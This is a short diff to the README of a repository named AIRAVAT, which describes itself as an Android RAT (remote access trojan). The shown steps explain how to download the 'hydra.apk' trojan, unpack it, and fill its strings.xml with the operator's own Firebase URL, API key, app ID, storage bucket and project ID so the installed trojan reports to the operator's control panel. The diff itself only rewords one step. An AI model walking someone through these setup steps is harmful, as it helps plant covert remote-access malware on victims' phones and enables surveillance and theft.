pashamasr01287654800/AIRAVAT/README.md

  1. Save the file , Your Panel Setup is completed.
  ### Android RAT
  1. Download [hydra.apk](./ANDROID%20APP/hydra.apk)
- 1. Decompile it using any Decompiler recommend above.
+ 1. Unpack or edit the apk using any software recommended above.
  1. Now open `res/values/strings.xml` file.
  1. Replace values of `firebase_database_url ` , `google_api_key` , `google_app_id` , `google_storage_bucket` , `project_id` with your Firebase Account using `google-services.json` file which you have downloaded on step 5
     - Example